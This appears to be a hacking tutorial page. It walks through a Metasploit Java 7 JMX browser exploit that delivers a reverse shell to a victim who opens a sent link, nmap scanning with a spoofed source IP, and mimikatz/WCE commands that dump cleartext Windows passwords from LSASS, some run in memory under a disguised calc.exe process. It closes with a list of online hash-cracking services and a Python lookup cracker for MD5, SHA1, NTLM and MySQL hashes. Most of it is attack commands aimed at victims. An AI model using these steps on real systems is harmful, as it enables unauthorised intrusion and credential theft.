JAVA APPLET JMX REMOTE CODE EXECUTION:-

This vulnerability was exploited in the wild in February 2013. The Metasploit module abuses the JMX classes from a Java applet to run arbitrary Java code outside the sandbox; additionally, it bypasses the default security settings introduced in Java 7 Update 10, so the unsigned applet runs without displaying any warning to the user.

Any operating system whose browser runs the Java 7 Update 10 plugin is exploitable. The attacker needs nothing more than Metasploit.

Open a terminal and type the following commands:

msfconsole
msf > use exploit/multi/browser/java_jre17_jmxbean_2
msf exploit(java_jre17_jmxbean_2) > set payload java/shell_reverse_tcp
msf exploit(java_jre17_jmxbean_2) > set lhost 192.168.1.7      (IP of the attacker's machine, which the reverse shell connects back to)
msf exploit(java_jre17_jmxbean_2) > set srvhost 192.168.1.7    (must be an address on the local machine; the exploit's web server binds to it)
msf exploit(java_jre17_jmxbean_2) > set uripath /              (the URL path to use for this exploit)
msf exploit(java_jre17_jmxbean_2) > exploit

Note the module path: it lives under exploit/multi/browser, not windows/browser, because the applet runs on any OS with a vulnerable Java plugin.

The URL to give your victim is http://192.168.1.7:8080/ (SRVHOST, the default SRVPORT of 8080, then URIPATH). Send the link to the victim. As soon as the victim opens it in a browser with the vulnerable Java plugin, you get a session. Then type the following commands:

sessions -l
sessions -i 1


You now have the victim's shell (a plain command shell, not Meterpreter, because the payload chosen was java/shell_reverse_tcp).
Spoofing the source address with nmap:-
nmap can send its probes out of a chosen interface with a spoofed source IP. The commands used are:
nmap -iflist
...to get a list of available interfaces. Once an interface is chosen (eth0 in this tutorial), use its name in the next command:
nmap -e eth0 -S 192.168.1.100 192.168.1.109
...which sends the scan out of eth0 with a spoofed source IP of 192.168.1.100 while scanning 192.168.1.109. Because the source address is spoofed, the target's replies are routed to 192.168.1.100, not back to us, so nmap never sees a response and reports every port as filtered rather than open; add -Pn as well, otherwise the host-discovery probes get no reply either and nmap declares the host down. The technique is therefore only useful when you can sniff the replies on the spoofed address's network segment, or when the goal is simply to make the target's logs show a different scanner address.


Get clear text password:-
The following are different ways to get clear-text Windows passwords from Metasploit. All of them read LSASS memory, so you need a native Windows Meterpreter session running as SYSTEM (or with SeDebugPrivilege); the Java shell from the applet exploit above cannot load these extensions or run execute -m. The mimikatz/WCE binary must also match the target's architecture (Win32 vs x64).
(1) Use mimikatz or WCE (Windows Credentials Editor) on the victim to get the clear-text password.
(2) You can also upload the mimikatz binary and use its password dump commands directly.
(3) You can also use the mimikatz Meterpreter extension:
meterpreter > load mimikatz
meterpreter > help mimikatz
meterpreter > kerberos
meterpreter > mimikatz_command -h
meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
(4) You can run WCE and mimikatz in memory without uploading the binary to disk. execute -m loads the file from the attacker's machine into a dummy process named with -d (here calc.exe), -H hides the window, -i interacts with the process and -c channelizes its I/O (required for -i); -a passes the command-line arguments.
(a) WCE in memory:
meterpreter > cd %systemroot%
meterpreter > cd system32
meterpreter > pwd
meterpreter > execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
meterpreter > cat foo.txt
(WCE writes foo.txt into the current directory, system32, so it does touch disk; remove it when done.)
(b) Mimikatz in memory:
meterpreter > cd %systemroot%
meterpreter > cd system32
meterpreter > execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
Online hash crackers:-
Online lookup services for hashed passwords, grouped by hash type. The Hashes column is the size of each service's database as listed; entries marked "Multi" or "?" give no size.

MD5
Cracker                  Hashes
Tobtu                    50,529,455,839
TMTO                     36,436,233,567
MD5Decrypter(uk)         8,700,000,000
OnlineHashCrack          5,211,644,250
AuthSecu                 500,000,000
MD5th                    400,000,000
NetMD5crack              171,392,210
Kalkulators              100,000,000
Rednoize                 76,834,449
Gromweb                  45,543,530
hash-cracker.com         40,000,000
Crackfoo -NNC            38,227,555
MD5Rainbow               33,517,066
Digitalsun               31,000,000
Sans                     20,264,963
Crackfor.me              16,173,854
MD5-lookup               8,796,772
MD5decrypter             8,103,123
MD5-db                   5,500,000
MD5-decrypter            3,400,000
HashCracking.ru          3,585,150
Shalla                   2,218,319
Hash-Database            1,635,062
MD5decryption            1,300,000
Drasen                   568,064
MD5finder                429,477
MD5pass                  327,497
Bokehman                 230,000
Shell-Storm              154,994
Appspot                  Multi
Noisette                 Multi
MD5crack                 Multi
Kinginfet                Multi
VHCTeam                  ?
Longgie                  ?
RAH-Labs                 ?
Wordd                    ?
Anqel                    ?
CMD5                     ?
web-security-services    ?
MD5online                ?
MD5.my-addr              ?
C0llision                ?
MD5hood                  ?
Schwett                  ?
TheKaine                 ?
Fox21                    ?

NTLM
Cracker                  Hashes
MD5decrypter(uk)         8,700,000,000
OnlineHashCrack          5,211,644,250
hash-cracker.com         40,000,000
Fox21                    ?
LMCrack                  ?
CMD5                     ?

LM
Cracker                  Hashes
OnlineHashCrack          5,211,644,250
NiceNameCrew             ?
C0llision                ?
Fox21                    ?

SHA1
Cracker                  Hashes
MD5Decrypter(uk)         8,700,000,000
Rednoize                 76,838,852
hash-cracker.com         40,000,000
Sans                     20,264,963
SHA1-Lookup              18,949,380
HashCracking.ru          3,585,150
Hash-Database            1,635,065
CMD5                     ?
StringFunction           ?
Web-Security-Services    ?

SHA256-512
Cracker                  Hashes
Hash-Database            1,635,067
Shalla                   1,143,472

MySQL
Cracker                  Hashes
OnlineHashCrack          5,211,644,250
Hashcrack                30,654,899
HashCracking.ru          3,585,150
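None of the services above break the hash functions; they hold precomputed tables of unsalted hashes and look the submitted value up. The following added example, not code from this page or from any listed service, does the same thing at small scale for the hash types in the tables (MD5, SHA1, SHA256, NTLM and MySQL 4.1+ PASSWORD()); LM is left out because it needs DES. NTLM is MD4 over the UTF-16LE password, and because hashlib's MD4 is often unavailable on OpenSSL 3 builds, a pure-Python MD4 is included. The wordlist and the hashes it resolves are constructed for the demonstration.

```python
import hashlib
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), included because NTLM needs it and
    hashlib.new("md4") is frequently missing on OpenSSL 3 without the legacy provider."""
    mask = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    rounds = (  # (function, additive constant, shift schedule, word order) per RFC 1320
        (F, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    bit_len = len(data) * 8
    msg = data + b"\x80"                                   # padding: 0x80, zeros, 64-bit LE length
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a, b, c, d = d, rotl((a + fn(b, c, d) + X[idx] + k) & mask, shifts[i % 4]), b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def ntlm(password: str) -> str:
    """NTLM = MD4(UTF-16LE(password)); no salt, so identical passwords give identical hashes."""
    return md4(password.encode("utf-16-le")).hex()


def mysql41(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' followed by uppercase hex of SHA1(SHA1(password))."""
    return "*" + hashlib.sha1(hashlib.sha1(password.encode()).digest()).hexdigest().upper()


ALGORITHMS = {
    "MD5": lambda p: hashlib.md5(p.encode()).hexdigest(),
    "SHA1": lambda p: hashlib.sha1(p.encode()).hexdigest(),
    "SHA256": lambda p: hashlib.sha256(p.encode()).hexdigest(),
    "NTLM": ntlm,
    "MySQL": mysql41,
}


def build_table(wordlist):
    """Hash every word under every algorithm once; afterwards each lookup is a dict hit."""
    table = {}
    for word in wordlist:
        for algo, fn in ALGORITHMS.items():
            table[fn(word).lower()] = (algo, word)
    return table


def lookup(hashes, table):
    """Map each hash to (algorithm, plaintext) or None. Case is normalised because
    MySQL prints uppercase hex while most other tools print lowercase."""
    return {h: table.get(h.strip().lower()) for h in hashes}


# Constructed wordlist and hashes for the demonstration (not data from the page).
WORDLIST = ["password", "letmein", "Summer2013!", "admin"]
SAMPLE_HASHES = [
    "5f4dcc3b5aa765d61d8327deb882cf99",            # MD5("password")
    "8846f7eaee8fb117ad06bdd830b7586c",            # NTLM("password")
    "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19",   # MySQL PASSWORD("password")
    "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",    # SHA1("password")
    "e10adc3949ba59abbe56e057f20f883e",            # MD5("123456"): not in WORDLIST, stays unresolved
]

if __name__ == "__main__":
    table = build_table(WORDLIST)
    for h, hit in lookup(SAMPLE_HASHES, table).items():
        print(f"{h:44} -> {hit if hit else 'not in table'}")
```

The table is built once and reused, which is exactly the economics of the services above: the cost is paid at table-building time, and every unsalted hash of a password that appears in the wordlist then resolves in constant time. Per-user salts and slow password hashes (bcrypt, scrypt, PBKDF2) defeat this kind of lookup; MD5, SHA1, NTLM and MySQL's PASSWORD() do not.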